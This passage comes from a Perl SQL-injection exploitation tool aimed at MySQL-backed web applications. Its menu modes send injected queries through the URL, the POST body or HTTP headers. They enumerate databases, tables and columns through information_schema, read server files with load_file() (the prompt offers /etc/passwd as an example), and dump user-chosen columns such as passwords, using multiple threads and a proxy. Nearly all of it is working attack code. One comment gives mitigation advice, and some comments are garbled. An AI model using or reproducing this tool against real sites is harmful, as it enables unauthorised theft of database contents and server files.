  574.      } elsif ($sql_flag == 1) {#POST: the query is sent as the body via $sql_post
  575.          $current = $source_sql;
  576.          $sql_post = $url11;
  577.          $content = scan_url_POST();
  578.      } elsif($sql_flag == 2){#HEADER: the query is placed in an HTTP header
  579.          $current = $source_sql;
  580.          $sql_header_query = $url11;
  581.          $sql_header_query =~ s!\Q$search!$replacement!g; # literal $search -> $replacement (both set elsewhere in the file)
  582.          $content = scan_url_HEADER();
  583.      }
  584.      $bd_num = $content;
  585.      $bd_num =~ m/ussr(.*?)ussr/img; # the value sits between two "ussr" markers in the response
  586.      $bd_num = $1;
  587.      print FILE "-----------------------------------------\n";
  588.      print FILE "Data bases in information_schema.schemata: $bd_num\n";
  589.      print FILE "-----------------------------------------\n";
  590.      print "-----------------------------------------\n";
  591.      print "Data bases in information_schema.schemata - $1\n";
  592.      print "-----------------------------------------\n";
  593.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "schema_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.schemata"; # row query; gets5050 appends the LIMIT clause
  594.      $num = -1; # pre-increment start: the first claimed row offset is 0
  595.      $thr = $kol_threads; # thread count
  596.      print "Request method - $method\n";
  597.      print "Threads - $kol_threads\n";
  598.      print "Proxy - $proxy_message\n";
  599.      print "----------------------\n";
  600.       for(0..$thr) { # spawn the workers, then wait for every one of them
  601.          $trl[$_] = threads->create(\&gets5050);
  602.      }
  603.      for(0..$thr) {
  604.          $trl[$_]->join;
  605.      }
  606.      sub gets5050 {
             # Worker: claim the next row offset and fetch that one schema_name.
  607.        $| = 1; # unbuffered STDOUT for the "\r" progress counter
  608.        while ($num<=$bd_num) {
  609.          { lock($num);
  610.          $num++; } # the increment is the only operation done under the lock
  611.          if($sql_flag == 0){
  612.               $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  613.               $content = scan_url();
  614.             } elsif ($sql_flag == 1) {#POST
  615.               $current = $source_sql;
  616.               $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  617.               $content = scan_url_POST();
  618.             } elsif($sql_flag == 2){#HEADER
  619.               $current = $source_sql;
  620.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  621.               $sql_header_query =~ s!\Q$search!$replacement!g;
  622.               $content = scan_url_HEADER();
  623.            }
  624.          if ($content =~ m/ussr(.*?)ussr/img) { # one value per response, between the markers
  625.                   print $1 . "\n";
  626.                   print FILE $1 . "\n";
  627.          }
  628.          print $num . "\r";
  629.          sleep $pause;
  630.  
  631.        }
  632.      }
  633.     print "----------\n";
  634.     print "Saved in " . "z_" . $host . ".txt\n";
  635.     close(FILE);
  636.     goto START;
  637. }
  638. if ($choice == 3) {
       # Mode 3: list the table names of one database.  The name is read from
       # STDIN, back-quoted if it contains '-', and hex-encoded by ascii_to_hex
       # for the information_schema.tables filter.  A count query runs first,
       # then the worker threads (gets5051) fetch one table_name per request
       # with "limit N,1".  Output is printed and appended to z_<host>.txt.
  639.      open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results log for this host
  640.      print "-----------------------------------------\n";
  641.      print "Enter the DB-name: ";
  642.      $choice = <STDIN>;
  643.      chomp $choice;
  644.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"} # back-quote identifiers containing '-'
  645.      print "DB-name: $choice\n";
  646.      print "----------\n";
  647.      $choice1 = ascii_to_hex $choice; # 0x... hex literal of the DB name
  648.      ## number of tables for this schema in information_schema.tables ##
  649.      $url11 = $sql_start . $sql_pref1 . "count(table_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $plus . "where" . $plus . "table_schema=" . $plus . $choice1 . $limit . $filtr;
  650.      if($sql_flag == 0){ # 0: the query rides in the request URL
  651.          $current = $url11;
  652.          $content = scan_url();
  653.      } elsif ($sql_flag == 1) {#POST: the query is sent as the body via $sql_post
  654.          $current = $source_sql;
  655.          $sql_post = $url11;
  656.          $content = scan_url_POST();
  657.      } elsif($sql_flag == 2){#HEADER: the query is placed in an HTTP header
  658.               $current = $source_sql;
  659.               $sql_header_query = $url11;
  660.               $sql_header_query =~ s!\Q$search!$replacement!g; # literal $search -> $replacement (both set elsewhere in the file)
  661.               $content = scan_url_HEADER();
  662.      }
  663.      $current = $url11;
  664.      $tab_num1 = $content;
  665.      $tab_num1 =~ m/ussr(.*?)ussr/img; # the value sits between two "ussr" markers in the response
  666.      $tab_num1 = $1;
  667.      print FILE "-----------------------------------------\n";
  668.      print FILE "Tables in DB [$choice]: $tab_num1\n";
  669.      print FILE "-----------------------------------------\n";
  670.      print "-----------------------------------------\n";
  671.      print "Tables in DB [$choice]: $tab_num1\n";
  672.      print "-----------------------------------------\n";
  673.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "table_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $plus . "where" . $plus . "table_schema=" . $plus . $choice1 ; # row query; gets5051 appends the LIMIT clause
  674.      $num = -1; # pre-increment start: the first claimed row offset is 0
  675.      $thr = $kol_threads; # thread count
  676.      print "Request method - $method\n";
  677.      print "Threads - $kol_threads\n";
  678.      print "Proxy - $proxy_message\n";
  679.      print "----------------------\n";
  680.       for(0..$thr) { # spawn the workers, then wait for every one of them
  681.          $trl[$_] = threads->create(\&gets5051);
  682.      }
  683.      for(0..$thr) {
  684.          $trl[$_]->join;
  685.      }
  686.      sub gets5051 {
             # Worker: claim the next row offset and fetch that one table_name.
  687.        $| = 1; # unbuffered STDOUT for the "\r" progress counter
  688.        while ($num<$tab_num1) {
  689.          { lock($num);
  690.          $num++; } # the increment is the only operation done under the lock
  691.          if($sql_flag == 0){
  692.             $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  693.             $content = scan_url();
  694.          } elsif ($sql_flag == 1) {#POST
  695.             $current = $source_sql;
  696.             $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  697.             $content = scan_url_POST();
  698.          } elsif($sql_flag == 2){#HEADER
  699.               $current = $source_sql;
  700.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  701.               $sql_header_query =~ s!\Q$search!$replacement!g;
  702.               $content = scan_url_HEADER();
  703.          }
  704.          if ($content =~ m/ussr(.*?)ussr/img) { # one value per response, between the markers
  705.                   print $1 . "\n";
  706.                   print FILE $1 . "\n";
  707.          }
  708.          print $num . "\r";
  709.          sleep $pause;
  710.  
  711.        }
  712.      }
  713.     print "----------\n";
  714.     print "Saved in " . "z_" . $host . ".txt\n";
  715.     close(FILE);
  716.     goto START;
  717. }
  718. if ($choice == 13) {
       # Mode 13: read a file from the database server through MySQL's
       # load_file(), looping on the prompt until "exit" is typed.  The file
       # name is passed as a 0x... hex literal built by ascii_to_hex.
       #
       # Mitigation/detection: load_file() only succeeds for a DB account that
       # holds the FILE privilege and is further restricted by the server's
       # secure_file_priv setting, so application accounts should not have
       # FILE; "load_file(" inside a request parameter is a high-confidence
       # indicator for WAF/IDS alerting.
  719.      M_LOAD_FILE:
  720.      open( FILE1, ">>" . "z_" .$host . ".txt" ); # append-mode results log for this host
  721.      print "-----------------------------------------\n";
  722.      print "Enter file name (example: /etc/passwd) or type <exit> for main menu: ";
  723.      $choice = <STDIN>;
  724.      chomp $choice;
  725.      if ($choice eq "exit") {close(FILE);goto START;}
  726.      print "File name for read: $choice\n";
  727.      $choice1 = ascii_to_hex $choice; # 0x... hex literal of the file name
  728.      if($sql_flag == 0){ # 0: the query rides in the request URL
  729.          $current = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,load_file($choice1))" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  730.          $content = scan_url();
  731.      } elsif ($sql_flag == 1) {#POST: the query is sent as the body via $sql_post
  732.          $current = $source_sql;
  733.          $sql_post = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,load_file($choice1))" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  734.          $content = scan_url_POST();
  735.      } elsif($sql_flag == 2){#HEADER: the query is placed in an HTTP header
  736.               $current = $source_sql;
  737.               $sql_header_query = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,load_file($choice1))" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  738.               $sql_header_query =~ s!\Q$search!$replacement!g; # literal $search -> $replacement (both set elsewhere in the file)
  739.               $content = scan_url_HEADER();
  740.      }
  741.      if ($content =~ m/ussr(.*?)ussr/imgs) { # file contents sit between the two "ussr" markers (/s spans newlines)
  742.             print "\n\n\n" . $1 . "\n";
  743.             print FILE $1 . "\n";
  744.      }
  745.      print "----------\n";
  746.      print "Saved in " . "z_" . $host . ".txt\n";
  747.      close(FILE);
  748.      goto M_LOAD_FILE;
  749. }
  750. if ($choice == 4) {
       # Mode 4: list the column names of one table.  DB and table names are
       # read from STDIN, back-quoted if they contain '-', and hex-encoded by
       # ascii_to_hex for the information_schema.columns filter.  A count query
       # runs first, then the worker threads (gets5052) fetch one column_name
       # per request with "limit N,1".  Output is printed and appended to
       # z_<host>.txt.
  751.      open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results log for this host
  752.      print "-----------------------------------------\n";
  753.      print "Enter the DB-name: ";
  754.      $choice = <STDIN>;
  755.      chomp $choice;
  756.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"} # back-quote identifiers containing '-'
  757.      print "DB-name: $choice\n";
  758.      print "----------\n";
  759.      $choice1 = ascii_to_hex $choice; # 0x... hex literal of the DB name
  760.      print "-----------------------------------------\n";
  761.      print "Enter the TABLE-name: ";
  762.      $choice2 = <STDIN>;
  763.      chomp $choice2;
  764.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"} # back-quote identifiers containing '-'
  765.      print "TABLE-name: $choice2\n";
  766.      print "----------\n";
  767.      $choice3 = ascii_to_hex $choice2; # 0x... hex literal of the table name
  768.      $url11 = $sql_start . $sql_pref1 . "count(column_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice3 . $plus . "and" . $plus . "table_schema=" . $plus . $choice1 . $limit . $filtr; # the count query
  769.     if($sql_flag == 0){ # 0: the query rides in the request URL
  770.          $current = $url11;
  771.          $content = scan_url();
  772.      } elsif ($sql_flag == 1) {#POST: the query is sent as the body via $sql_post
  773.          $current = $source_sql;
  774.          $sql_post = $url11;
  775.          $content = scan_url_POST();
  776.      } elsif($sql_flag == 2){#HEADER: the query is placed in an HTTP header
  777.               $current = $source_sql;
  778.               $sql_header_query = $url11;
  779.               $sql_header_query =~ s!\Q$search!$replacement!g; # literal $search -> $replacement (both set elsewhere in the file)
  780.               $content = scan_url_HEADER();
  781.      }
  782.      $col_num1 = $content;
  783.      $col_num1 =~ m/ussr(.*?)ussr/img; # the value sits between two "ussr" markers in the response
  784.      $col_num1 = $1;
  785.      print FILE "-----------------------------------------\n";
  786.      print FILE "Columns in [$choice.$choice2]: $col_num1\n";
  787.      print FILE "-----------------------------------------\n";
  788.      print "-----------------------------------------\n";
  789.      print "Columns in [$choice.$choice2]: $col_num1\n";
  790.      print "-----------------------------------------\n";
  791.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "column_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice3 . $plus . "and" . $plus . "table_schema=" . $plus . $choice1; # row query; gets5052 appends the LIMIT clause
  792.      $num = -1; # pre-increment start: the first claimed row offset is 0
  793.      $thr = $kol_threads; # thread count
  794.      print "Request method - $method\n";
  795.      print "Threads - $kol_threads\n";
  796.      print "Proxy - $proxy_message\n";
  797.      print "----------------------\n";
  798.       for(0..$thr) { # spawn the workers, then wait for every one of them
  799.          $trl[$_] = threads->create(\&gets5052);
  800.      }
  801.      for(0..$thr) {
  802.          $trl[$_]->join;
  803.      }
  804.      sub gets5052 {
             # Worker: claim the next row offset and fetch that one column_name.
  805.        $| = 1; # unbuffered STDOUT for the "\r" progress counter
  806.        while ($num<$col_num1) {
  807.          { lock($num);
  808.          $num++; } # the increment is the only operation done under the lock
  809.          if($sql_flag == 0){
  810.            $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  811.            $content = scan_url();
  812.          } elsif ($sql_flag == 1) {#POST
  813.            $current = $source_sql;
  814.            $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  815.            $content = scan_url_POST();
  816.          } elsif($sql_flag == 2){#HEADER
  817.               $current = $source_sql;
  818.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  819.               $sql_header_query =~ s!\Q$search!$replacement!g;
  820.               $content = scan_url_HEADER();
  821.          }
  822.          if ($content =~ m/ussr(.*?)ussr/img) { # one value per response, between the markers
  823.                   print $1 . "\n";
  824.                   print FILE $1 . "\n";
  825.          }
  826.          print $num . "\r";
  827.          sleep $pause;
  828.  
  829.        }
  830.      }
  831.     print "----------\n";
  832.     print "Saved in " . "z_" . $host . ".txt\n";
  833.     close(FILE);
  834.     goto START;
  835. }
  836. #################################################################################
  837. if ($choice == 5) {
       # Mode 5: list every table name in information_schema.tables.  A count
       # query runs first; the user then either takes the whole range or gives
       # START/END positions, which set the shared counter $num and the upper
       # bound $tab_num.  The worker threads (gets) fetch one table_name per
       # request with "limit N,1".  Output is printed and appended to z_<host>.txt.
  838.      open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results log for this host
  839.      ## number of tables in information_schema.tables ##
  840.      $url11 = $sql_start . $sql_pref1 . "count(table_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $limit . $filtr; # the count query
  841.      if($sql_flag == 0){ # 0: the query rides in the request URL
  842.          $current = $url11;
  843.          $content = scan_url();
  844.      } elsif ($sql_flag == 1) {#POST: the query is sent as the body via $sql_post
  845.          $current = $source_sql;
  846.          $sql_post = $url11;
  847.          $content = scan_url_POST();
  848.      } elsif($sql_flag == 2){#HEADER: the query is placed in an HTTP header
  849.               $current = $source_sql;
  850.               $sql_header_query = $url11;
  851.               $sql_header_query =~ s!\Q$search!$replacement!g; # literal $search -> $replacement (both set elsewhere in the file)
  852.               $content = scan_url_HEADER();
  853.      }  
  854.      $tab_num = $content;
  855.      $tab_num =~ m/ussr(.*?)ussr/imgs; # the value sits between two "ussr" markers in the response
  856.      $tab_num = $1; # table count reported by information_schema
  857.      print "-----------------------------------------\n";
  858.      print "Tables in information_schema.tables - $1\n";
  859.      print "-----------------------------------------\n";
  860.      ## start from2: optional START/END range ##
  861.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
  862.      $choice = <STDIN>;
  863.      chomp $choice;
  864.      $thr = $kol_threads; # thread count
  865.      if ($choice == 1) {
  866.           $num = -1; # pre-increment start: the first claimed row offset is 0
  867.      } else {
  868.           print "Enter START_position: ";
  869.           $choice1 = <STDIN>;
  870.           chomp $choice1;
  871.           $num = $choice1-2; # 1-based START maps to a 0-based offset, pre-incremented
  872.           print "Enter END_position: ";
  873.           $choice2 = <STDIN>;
  874.           chomp $choice2;
  875.           $tab_num = $choice2-1; # 1-based END becomes the loop bound
  876.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
  877.      }
  878.      print "-----------------------------------------\n";
  879.      ## end from2
  880.      print FILE  "-----------------------------------------\n";
  881.      print FILE  "Tables in information_schema.tables - $1\n";
  882.      print FILE  "-----------------------------------------\n";
  883.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "table_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.tables"; # row query; gets appends the LIMIT clause
  884.      print "Request method - $method\n";
  885.      print "Threads - $kol_threads\n";
  886.      print "Proxy - $proxy_message\n";
  887.      print "----------------------\n";
  888.      for(0..$thr) { # spawn the workers, then wait for every one of them
  889.          $trl[$_] = threads->create(\&gets);
  890.      }
  891.      for(0..$thr) {
  892.          $trl[$_]->join;
  893.      }
  894.      sub gets {
             # Worker: claim the next row offset and fetch that one table_name.
  895.        $| = 1; # unbuffered STDOUT for the "\r" progress counter
  896.        while ($num<$tab_num) {
  897.          { lock($num);
  898.          $num++; } # the increment is the only operation done under the lock
  899.          if($sql_flag == 0){
  900.            $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  901.            $content = scan_url();
  902.          } elsif ($sql_flag == 1) {#POST
  903.            $current = $source_sql;
  904.            $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  905.            $content = scan_url_POST();
  906.         } elsif($sql_flag == 2){#HEADER
  907.               $current = $source_sql;
  908.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  909.               $sql_header_query =~ s!\Q$search!$replacement!g;
  910.               $content = scan_url_HEADER();
  911.         }  
  912.          if ($content =~ m/ussr(.*?)ussr/img) { # one value per response, between the markers
  913.                   print $1 . "\n";
  914.                   print FILE $1 . "\n";
  915.          }
  916.          print $num . "\r";
  917.          sleep $pause;
  918.  
  919.        }
  920.      }
  921.     print "----------\n";
  922.     print "Saved in " . "z_" . $host . ".txt\n";
  923.     close(FILE);
  924.     goto START;
  925. }
  926. if ($choice == 6) {
      # Mode 6: for a table name read from STDIN, look up its schema in
      # information_schema.tables, count its columns in information_schema.columns,
      # then have the worker threads (gets2) fetch one column_name per request
      # with "limit N,1".  $full_table_name ("<schema>.<table>") is left set for
      # reuse by a later mode.  Output is printed and appended to z_<host>.txt.
  927.     open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results log for this host
  928.     print "-----------------------------------------\n";
  929.     print "Enter the table_name: ";
  930.     $choice = <STDIN>;
  931.     chomp $choice;
  932.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"} # back-quote identifiers containing '-'
  933.     print "Table: $choice\n";
  934.     print "----------\n";
  935.     print FILE  "-----------------------------------------\n";
  936.     print FILE  "Table [ $choice ]\n";
  937.     print FILE  "-----------------------------------------\n";
  938.     $choice1 = ascii_to_hex $choice; # 0x... hex literal of the table name
  939.     $url13 = $sql_start . $sql_CP_start . $sql_pref1 . "table_schema" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr; # which schema owns this table
  940.     if($sql_flag == 0){ # 0: the query rides in the request URL
  941.          $current = $url13;
  942.          $content = scan_url();
  943.      } elsif ($sql_flag == 1) {#POST: the query is sent as the body via $sql_post
  944.          $current = $source_sql;
  945.          $sql_post = $url13;
  946.          $content = scan_url_POST();
  947.     } elsif($sql_flag == 2){#HEADER: the query is placed in an HTTP header
  948.               $current = $source_sql;
  949.               $sql_header_query = $url13;
  950.               $sql_header_query =~ s!\Q$search!$replacement!g; # literal $search -> $replacement (both set elsewhere in the file)
  951.               $content = scan_url_HEADER();
  952.     }  
  953.     $prefix = $content;
  954.     $prefix =~ m/ussr(.*?)ussr/img; # the value sits between two "ussr" markers in the response
  955.     $prefix = $1; # schema that contains the table
  956.     if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"} # back-quote identifiers containing '-'
  957.     print "Database for $choice: $prefix\n";
  958.     print FILE  "Database for $choice: $prefix\n";
  959.     $url14 = $sql_start . $sql_pref1 . "count(*)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr; # column count query
  960.     if($sql_flag == 0){
  961.          $current = $url14;
  962.          $content = scan_url();
  963.      } elsif ($sql_flag == 1) {#POST
  964.          $current = $source_sql;
  965.          $sql_post = $url14;
  966.          $content = scan_url_POST();
  967.      } elsif($sql_flag == 2){#HEADER
  968.               $current = $source_sql;
  969.               $sql_header_query = $url14;
  970.               $sql_header_query =~ s!\Q$search!$replacement!g;
  971.               $content = scan_url_HEADER();
  972.     }  
  973.     $colum_number = $content;
  974.     $colum_number =~ m/ussr(.*?)ussr/img;
  975.     $colum_number = $1; # number of columns in the chosen table
  976.     $full_table_name = $prefix . "." . $choice;
  977.     print "Number of columns in " . $full_table_name . ": $colum_number\n";
  978.     print FILE  "Number of columns in " . $full_table_name . ": $colum_number\n";
  979.     print "----------\n";
  980.     ## column listing ##
  981.     $thr = $kol_threads; # thread count
  982.     $num = -1; # pre-increment start: the first claimed row offset is 0
  983.     print "Request method - $method\n";
  984.     print "Threads - $kol_threads\n";
  985.     print "Proxy - $proxy_message\n";
  986.     print "----------------------\n";
  987.     $url15 = $sql_start . $sql_CP_start . $sql_pref1 . "column_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1; # row query; gets2 appends the LIMIT clause
  988.     print FILE  "Columns in " . $full_table_name . "\n";
  989.     for(0..$thr) { # spawn the workers, then wait for every one of them
  990.          $trl[$_] = threads->create(\&gets2);
  991.     }
  992.     for(0..$thr) {
  993.          $trl[$_]->join;
  994.     }
  995.     sub gets2 {
            # Worker: claim the next row offset and fetch that one column_name.
  996.        $| = 1; # unbuffered STDOUT for the "\r" progress counter
  997.        while ($num<$colum_number) {
  998.          { lock($num);
  999.          $num++; } # the increment is the only operation done under the lock
  1000.          if($sql_flag == 0){
  1001.             $current = $url15 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1002.             $content = scan_url();
  1003.          } elsif ($sql_flag == 1) {#POST
  1004.             $current = $source_sql;
  1005.             $sql_post = $url15 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1006.             $content = scan_url_POST();
  1007.         } elsif($sql_flag == 2){#HEADER
  1008.               $current = $source_sql;
  1009.               $sql_header_query = $url15 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1010.               $sql_header_query =~ s!\Q$search!$replacement!g;
  1011.               $content = scan_url_HEADER();
  1012.         }  
  1013.          if ($content =~ m/ussr(.*?)ussr/img) { # one value per response, between the markers
  1014.                   print "   " . $1 . "\n";
  1015.                   print FILE "  "  . $1 . "\n";
  1016.          }
  1017.          print $num . "\r";
  1018.          sleep $pause;
  1019.  
  1020.        }
  1021.     }
  1022.     print FILE "----------\n";
  1023.     print "----------\n";
  1024.     print "Saved in " . "z_" . $host . ".txt\n";
  1025.     close(FILE);
  1026.     goto START;
  1027. }
  1028. if ($choice == 7) {
  1029.     sub ascii_to_hex ($) {
             # Render a string as a MySQL hex literal: "0x" followed by two hex
             # digits per character.  Being a named sub, it is compiled at load
             # time and so is callable from the other modes above even though
             # it is written inside this if-block.  The ($) prototype is what
             # lets the paren-less calls `ascii_to_hex $x` parse as a unary
             # operator.  It works per character via ord, so a character above
             # 0xFF yields more than two digits; input is expected to be ASCII/bytes.
  1030.              (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  1031.              $str = "0x" . $str;
  1032.              return $str;
  1033.     }
  1034.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  1035.     if ($full_table_name) {
  1036.        print "-----------------------------------------\n";
  1037.        print "Use last parsed table: $full_table_name ? (1/0): ";
  1038.        $choice = <STDIN>;
  1039.        chomp $choice;
  1040.        if ($choice==1) {
  1041.              $table_name = $full_table_name;
  1042.              print "Table: $table_name\n";
  1043.              print "----------\n";
  1044.        } else {
  1045.              print "-----------------------------------------\n";
  1046.              print "Enter the table_name: ";
  1047.              $choice = <STDIN>;
  1048.              chomp $choice;
  1049.              if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  1050.              $table_name = $choice;
  1051.              if ($table_name =~ m/-/imgs) {$table_name = "`" . $table_name . "`"}
  1052.              print "-----------------------------------------\n";
  1053.              print "MySQL>=5 or MySql<5? (1/0): ";
  1054.              $choice = <STDIN>;
  1055.              chomp $choice;
  1056.              if ($choice == 1) {
  1057.                   $choice1 = ascii_to_hex $table_name;
  1058.                   $url13 = $sql_start . $sql_CP_start . $sql_pref1 . "table_schema" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
  1059.                   if($sql_flag == 0){
  1060.                     $current = $url13;
  1061.                     $content = scan_url();
  1062.                   } elsif ($sql_flag == 1) {#POST
  1063.                     $current = $source_sql;
  1064.                     $sql_post = $url13;
  1065.                     $content = scan_url_POST();
  1066.                   } elsif($sql_flag == 2){#HEADER
  1067.                     $current = $source_sql;
  1068.                     $sql_header_query = $url13;
  1069.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1070.                     $content = scan_url_HEADER();
  1071.                   }  
  1072.                   $prefix = $content;
  1073.                   $prefix =~ m/ussr(.*?)ussr/img;
  1074.                   $prefix = $1; # ??, ? ??????? ???????
  1075.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  1076.                   $table_name = "`" . $prefix . "." . $table_name . "`";
  1077.              }
  1078.              print "Table: $table_name\n";
  1079.              print "----------\n";
  1080.        }
  1081.     } else {
  1082.        print "-----------------------------------------\n";
  1083.        print "Enter the table_name: ";
  1084.        $choice = <STDIN>;
  1085.        chomp $choice;
  1086.        $table_name = $choice;
  1087.        if ($table_name =~ m/-/imgs) {$table_name = "`" . $table_name . "`"}
  1088.        print "-----------------------------------------\n";
  1089.        print "MySQL>=5 or MySql<5? [if DBname.TableName - 0] (1/0): ";
  1090.        $choice = <STDIN>;
  1091.        chomp $choice;
  1092.        if ($choice == 1) {
  1093.                   $choice1 = ascii_to_hex $table_name;
  1094.                   $url13 = $sql_start . $sql_CP_start . $sql_pref1 . "table_schema" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
  1095.                    if($sql_flag == 0){
  1096.                     $current = $url13;
  1097.                     $content = scan_url();
  1098.                   } elsif ($sql_flag == 1) {#POST
  1099.                     $current = $source_sql;
  1100.                     $sql_post = $url13;
  1101.                     $content = scan_url_POST();
  1102.                   } elsif($sql_flag == 2){#HEADER
  1103.                     $current = $source_sql;
  1104.                     $sql_header_query = $url13;
  1105.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1106.                     $content = scan_url_HEADER();
  1107.                   }  
  1108.                   $prefix = $content;
  1109.                   $prefix =~ m/ussr(.*?)ussr/img;
  1110.                   $prefix = $1; # ??, ? ??????? ???????
  1111.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  1112.                   $table_name = $prefix . "." . $table_name;
  1113.        }
  1114.        print "Table: $table_name\n";
  1115.        print "----------\n";
  1116.     }
  1117.     print "-----------------------------------------\n";
  1118.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
  1119.     $choice = <STDIN>;
  1120.     chomp $choice;
  1121.     $column_name = $choice;
  1122.     print FILE  "-----------------------------------------\n";
  1123.     print FILE  "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  1124.     print FILE  "-----------------------------------------\n";
  1125.     print "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  1126.     print "-----------------------------------------\n";
  1127.     print "Do you want add condition to sql-query?\n";
  1128.     print "----------\n";
  1129.     print "for example - where id=1, where username=admin (no quotes)  ? (1/0): ";
  1130.     $choice = <STDIN>;
  1131.     chomp $choice;
  1132.     if ($choice==1) {
  1133.         print "-----------------------------------------\n";
  1134.         print "Enter your condition here - only one condition, without 'where', '+' and quotes, example - id=1 :\n";
  1135.         print "----------\n";
  1136.         $choice = <STDIN>;
  1137.         chomp $choice;
  1138.  
  1139.         $where = $choice;
  1140.         # ?????????:
  1141.         ($con,$whe) = split(/=/,$where);
  1142.         if($whe =~ m/[^0-9]/img) {$where = $con . "=" . ascii_to_hex $whe}
  1143.         print "Your condition: [ where $where ]\n";
  1144.         $condition=1;
  1145.     } else {
  1146.         $condition=0;
  1147.     }
  1148.     if ($condition==0) {
  1149.          print "----------\n";
  1150.          ## ?????? ???-?? ???????? ?? ??????? #
  1151.          print "Count data from [ $table_name  ]\n";
  1152.          $url16 = $sql_start . $sql_pref1 . "count(*)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . $table_name . $limit . $filtr;
  1153.          if($sql_flag == 0){
  1154.               $current = $url16;
  1155.               $content = scan_url();
  1156.          } elsif ($sql_flag == 1) {#POST
  1157.               $current = $source_sql;
  1158.               $sql_post = $url16;
  1159.               $content = scan_url_POST();
  1160.          } elsif($sql_flag == 2){#HEADER
  1161.                     $current = $source_sql;
  1162.                     $sql_header_query = $url16;
  1163.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1164.                     $content = scan_url_HEADER();
  1165.          }  
  1166.          $column_name_p = $content;
  1167.          $column_name_p =~ m/ussr(.*?)ussr/img;
  1168.          $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
  1169.          print "$column_name_p\n";
  1170.          print "----------\n";
  1171.          ## start from2 ##
  1172.          print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
  1173.          $choice = <STDIN>;
  1174.          chomp $choice;
  1175.          $thr = $kol_threads; # ???-?? ???????
  1176.          if ($choice == 1) {
  1177.               $num = -1; # ?? ????????
  1178.          } else {
  1179.               print "Enter START_position: ";
  1180.               $choice1 = <STDIN>;
  1181.               chomp $choice1;
  1182.               $num = $choice1-2;
  1183.               print "Enter END_position: ";
  1184.               $choice2 = <STDIN>;
  1185.               chomp $choice2;
  1186.               $column_name_p = $choice2-1;
  1187.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
